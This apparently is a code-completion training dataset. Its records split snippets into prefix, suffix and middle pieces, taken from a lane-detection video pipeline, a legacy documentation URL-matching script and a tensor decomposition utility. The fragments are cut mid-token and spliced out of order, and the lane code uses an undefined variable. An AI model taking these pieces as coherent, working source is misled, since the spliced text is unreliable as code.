missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
produ | url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| ct_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data: | conditional_block |
Pipeline_for_videos.py | o = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
| s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size, | count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
| conditional_block |
Pipeline_for_videos.py | o = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
| #plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size | random_line_split |
|
Pipeline_for_videos.py |
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,25 | gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary | identifier_body |
|
Pipeline_for_videos.py | (image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=( | mag_thresh | identifier_name |
|
decomposition_utils.py | Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
